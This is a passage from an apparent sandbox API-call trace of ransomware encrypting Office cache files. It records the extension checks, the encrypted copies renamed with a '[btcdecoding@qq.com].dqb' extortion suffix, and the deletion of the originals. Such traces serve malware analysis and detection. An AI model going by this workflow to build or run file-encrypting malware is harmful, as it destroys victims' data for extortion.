Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.941] lstrlenW (lpString=".doc") returned 4 [0044.941] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString=".docx") returned 5 [0044.941] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.941] lstrlenW (lpString=".pdf") returned 4 [0044.941] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString=".xls") returned 4 [0044.941] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString=".xlsx") returned 5 [0044.941] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.941] lstrlenW (lpString=".ppt") returned 4 [0044.941] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.941] lstrlenW (lpString=".zip") returned 4 [0044.941] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString=".rar") returned 4 [0044.941] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString=".bz2") returned 4 [0044.941] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.941] lstrlenW (lpString=".7z") returned 3 [0044.941] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.941] lstrlenW (lpString=".dbf") returned 4 [0044.941] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.941] lstrlenW (lpString=".1cd") returned 4 [0044.942] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".jpg") returned 4 [0044.942] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".doc") returned 4 [0044.942] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString=".docx") returned 5 [0044.942] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.942] lstrlenW (lpString=".pdf") returned 4 [0044.942] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString=".xls") returned 4 [0044.942] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString=".xlsx") returned 5 [0044.942] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.942] lstrlenW (lpString=".ppt") returned 4 [0044.942] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".zip") returned 4 [0044.942] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString=".rar") returned 4 [0044.942] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString=".bz2") returned 4 [0044.942] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.942] lstrlenW (lpString=".7z") returned 3 [0044.942] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".dbf") returned 4 [0044.942] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".1cd") returned 4 [0044.942] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0044.942] lstrlenW (lpString=".jpg") returned 4 [0044.943] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.943] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0044.943] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0044.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.943] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=868864) returned 1 [0044.943] CloseHandle (hObject=0x174) returned 1 [0044.943] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0044.943] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.943] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.943] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0044.944] GetLastError () returned 0x0 [0044.944] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xd4200, lpOverlapped=0x0) returned 1 [0045.015] WriteFile (in: hFile=0x200, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0045.031] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.031] WriteFile (in: hFile=0x200, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0045.031] SetEndOfFile (hFile=0x200) returned 1 [0045.031] CloseHandle (hObject=0x200) returned 1 [0045.032] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.032] SetEndOfFile (hFile=0x174) returned 1 [0045.039] CloseHandle (hObject=0x174) returned 1 [0045.039] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.039] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString=".doc") returned 4 [0045.040] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.040] lstrlenW (lpString=".docx") returned 5 [0045.040] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0045.040] lstrlenW (lpString=".pdf") returned 4 [0045.040] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.040] lstrlenW (lpString=".xls") returned 4 [0045.040] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.040] lstrlenW (lpString=".xlsx") returned 5 [0045.040] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0045.040] lstrlenW (lpString=".ppt") returned 4 [0045.040] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString=".zip") returned 4 [0045.040] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.040] lstrlenW (lpString=".rar") returned 4 [0045.040] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.040] lstrlenW (lpString=".bz2") returned 4 [0045.040] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.040] lstrlenW (lpString=".7z") returned 3 [0045.040] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString=".dbf") returned 4 [0045.040] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString=".1cd") returned 4 [0045.040] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString=".jpg") returned 4 [0045.040] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.041] lstrlenW (lpString=".doc") returned 4 [0045.041] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.041] lstrlenW (lpString=".docx") returned 5 [0045.041] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0045.041] lstrlenW (lpString=".pdf") returned 4 [0045.041] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.041] lstrlenW (lpString=".xls") returned 4 [0045.041] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.041] lstrlenW (lpString=".xlsx") returned 5 [0045.041] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0045.041] lstrlenW (lpString=".ppt") returned 4 [0045.041] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.041] lstrlenW (lpString=".zip") returned 4 [0045.041] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.041] lstrlenW (lpString=".rar") returned 4 [0045.041] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.041] lstrlenW (lpString=".bz2") returned 4 [0045.041] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.041] lstrlenW (lpString=".7z") returned 3 [0045.041] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.041] lstrlenW (lpString=".dbf") returned 4 [0045.041] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.041] lstrlenW (lpString=".1cd") returned 4 [0045.041] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.041] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0045.041] lstrlenW (lpString=".jpg") returned 4 [0045.041] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.041] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0045.042] lstrlenW (lpString="ose.exe") returned 7 [0045.042] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.042] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=174440) returned 1 [0045.042] CloseHandle (hObject=0x174) returned 1 [0045.042] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0045.042] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.042] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.042] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.042] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.042] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.043] GetLastError () returned 0x0 [0045.043] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0045.058] WriteFile (in: hFile=0x200, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0045.063] ReadFile (in: hFile=0x174, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.064] WriteFile (in: hFile=0x200, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0045.064] SetEndOfFile (hFile=0x200) returned 1 [0045.064] CloseHandle (hObject=0x200) returned 1 [0045.064] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.064] SetEndOfFile (hFile=0x174) returned 1 [0045.066] CloseHandle (hObject=0x174) returned 1 [0045.066] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0045.066] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.066] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.066] lstrlenW (lpString=".doc") returned 4 [0045.066] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.066] lstrlenW (lpString=".docx") returned 5 [0045.066] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0045.066] lstrlenW (lpString=".pdf") returned 4 [0045.066] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.066] lstrlenW (lpString=".xls") returned 4 [0045.066] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.066] lstrlenW (lpString=".xlsx") returned 5 [0045.066] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0045.066] lstrlenW (lpString=".ppt") returned 4 [0045.066] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".zip") returned 4 [0045.067] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString=".rar") returned 4 [0045.067] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString=".bz2") returned 4 [0045.067] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.067] lstrlenW (lpString=".7z") returned 3 [0045.067] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".dbf") returned 4 [0045.067] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".1cd") returned 4 [0045.067] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".jpg") returned 4 [0045.067] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".doc") returned 4 [0045.067] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.067] lstrlenW (lpString=".docx") returned 5 [0045.067] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0045.067] lstrlenW (lpString=".pdf") returned 4 [0045.067] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString=".xls") returned 4 [0045.067] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString=".xlsx") returned 5 [0045.067] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0045.067] lstrlenW (lpString=".ppt") returned 4 [0045.067] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.067] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.067] lstrlenW (lpString=".zip") returned 4 [0045.067] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.068] lstrlenW (lpString=".rar") returned 4 [0045.068] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.068] lstrlenW (lpString=".bz2") returned 4 [0045.068] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.068] lstrlenW (lpString=".7z") returned 3 [0045.068] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.068] lstrlenW (lpString=".dbf") returned 4 [0045.068] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.068] lstrlenW (lpString=".1cd") returned 4 [0045.068] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.068] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.068] lstrlenW (lpString=".jpg") returned 4 [0045.068] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.068] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0045.068] lstrlenW (lpString="osetup.dll") returned 10 [0045.068] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.068] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=7378792) returned 1 [0045.068] CloseHandle (hObject=0x174) returned 1 [0045.069] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0045.069] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0045.069] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0045.069] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.069] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.069] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.069] ReadFile (in: hFile=0x174, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.077] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.077] ReadFile (in: hFile=0x174, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.086] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.086] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.086] ReadFile (in: hFile=0x174, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.361] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.361] WriteFile (in: hFile=0x174, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 